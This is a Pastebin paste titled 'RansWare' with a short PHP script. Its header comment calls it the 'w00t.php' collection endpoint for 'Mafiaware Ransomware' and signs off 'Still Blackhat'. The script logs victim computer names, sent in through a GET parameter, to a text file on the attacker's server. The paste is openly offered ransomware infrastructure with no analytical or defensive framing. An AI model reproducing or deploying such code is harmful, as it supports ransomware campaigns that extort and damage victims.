Vipera1

RansWare

Mar 21st, 2017
45
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.  * Coded by : Cyberking
  4.  * This script for w00t.php on Mafiaware Ransomware (http://pastebin.com/0RWjbxxY)
  5.  * Still Blackhat, Don't Trust Anyone !
  6.  */
  7.  
  8. $computerName = $_GET['info'];
  9. $File = "w00t.txt";
  10. $fhandle = fopen($File, 'a');
  11.  
  12. fwrite($fhandle,"\n");
  13. fwrite($fhandle,$computerName);
  14. fclose($fhandle);
  15. ?>
Add Comment
Please, Sign In to add comment